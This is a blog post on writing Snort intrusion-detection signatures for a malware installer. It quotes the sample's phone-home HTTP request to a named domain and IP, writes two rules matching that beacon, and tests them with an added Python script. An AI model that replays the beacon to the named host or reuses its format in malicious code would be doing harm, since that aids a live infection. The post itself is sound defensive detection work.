Sunday, January 3, 2010

Snort Signature Practice: A-Install-815416_2009-1939.exe

A-Install-815416_2009-1939.exe pops up an error window, phones home to needforspeedeu.com (91.213.121.52) and also tries to resolve thebigben.cn. The phone-home request looks like this:

GET /?act=fb&1=1&2=1262237847&3=5.1.2.0.2600&4=IEXPLORE.EXE&5=18&6=4&7=127&8=19&9=0&10=2009-1939 HTTP/1.1
Accept: */*
User-Agent: Mozilla
Host: needforspeedeu.com
Cache-Control: no-cache

Comparing a few captures shows which parameters stay constant and which vary:

act=fb (same)
1=1 (same)
2= up to 10 digits (diff)
3=5.1.x.0 (diff)
4=IEXPLORE.EXE (same)
5= 2 digits (diff)
6= 1 digit (diff)
7= up to 3 digits (diff)
8= up to 3 digits (diff)
9=0 (same)
10= possible timestamp (diff)

My first signature tries to match the particulars of the parameters with a pcre:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"A-Install-815416_2009-1939.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/?act=fb&1=1"; pcre:"/&2=[0-9]{1,10}&3=5\.1\.[0-9]\.0\.2600&4=IEXPLORE\.EXE&5=[0-9]{2}&6=[0-9]&7=[0-9]{1,3}&8=[0-9]{1,3}&9=0&10=/"; sid:123120092;)

This didn't feel like a clean signature, so I simplified it to:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"A-Install-815416_2009-1939.exe malware (simplified)"; flow:to_server; content:"GET"; http_method; uricontent:"/?act="; uricontent:"&1="; uricontent:"&2="; uricontent:"&3="; uricontent:"&4="; uricontent:"&5="; uricontent:"&6="; uricontent:"&7="; uricontent:"&8="; uricontent:"&9="; uricontent:"&10="; sid:010220101;)
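To see what the two rules trade off, here is an added Python check (not from the post) that applies the first rule's pcre and the simplified rule's list of uricontent tokens to a few constructed request lines: the observed beacon, a variant inside the observed ranges, and two look-alikes that only the simplified rule flags. The hostnames and the "3=5.1.2.0.3790" value are constructed for the test and not from a capture.

```python
import re

# Strict check: the pcre from the first signature, applied to the URI.
STRICT_RE = re.compile(
    r"&2=[0-9]{1,10}&3=5\.1\.[0-9]\.0\.2600&4=IEXPLORE\.EXE"
    r"&5=[0-9]{2}&6=[0-9]&7=[0-9]{1,3}&8=[0-9]{1,3}&9=0&10="
)
# Loose check: the eleven uricontent tokens from the simplified signature.
LOOSE_TOKENS = ["/?act=", "&1=", "&2=", "&3=", "&4=", "&5=",
                "&6=", "&7=", "&8=", "&9=", "&10="]


def uri_from_request(raw):
    """Return the request-target of a GET request line, else None."""
    method, target, _version = raw.split("\r\n", 1)[0].split(" ", 2)
    return target if method == "GET" else None


def strict_match(uri):
    # uricontent:"/?act=fb&1=1" plus the pcre; both must hit.
    return "/?act=fb&1=1" in uri and STRICT_RE.search(uri) is not None


def loose_match(uri):
    # Each uricontent must appear somewhere; with no distance/within
    # modifiers Snort does not require them to be in order.
    return all(tok in uri for tok in LOOSE_TOKENS)


def classify(uri):
    return {"strict": strict_match(uri), "loose": loose_match(uri)}


# Constructed requests (first line only): the observed beacon, a variant
# inside the observed ranges, and two look-alikes that fail the pcre.
SAMPLES = {
    "observed": "GET /?act=fb&1=1&2=1262237847&3=5.1.2.0.2600&4=IEXPLORE.EXE"
                "&5=18&6=4&7=127&8=19&9=0&10=2009-1939 HTTP/1.1\r\nHost: x\r\n",
    "variant": "GET /?act=fb&1=1&2=1262300000&3=5.1.3.0.2600&4=IEXPLORE.EXE"
               "&5=22&6=1&7=5&8=200&9=0&10=2009-1939 HTTP/1.1\r\nHost: x\r\n",
    "other_build": "GET /?act=fb&1=1&2=1262300000&3=5.1.2.0.3790&4=IEXPLORE.EXE"
                   "&5=22&6=1&7=5&8=200&9=0&10=2009-1939 HTTP/1.1\r\nHost: x\r\n",
    "benign": "GET /?act=view&1=a&2=b&3=c&4=d&5=e&6=f&7=g&8=h&9=i&10=j HTTP/1.1\r\n",
}


def run_samples():
    return {name: classify(uri_from_request(req)) for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(f"{name:12s} strict={verdict['strict']!s:5s} loose={verdict['loose']}")
```

The benign URI shows the cost of the simplified rule: any request that happens to carry eleven numbered parameters trips it, while the pcre rule only fires on the exact value shapes seen in the captures.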

References:

VirusTotal
CWSandbox
ThreatExpert
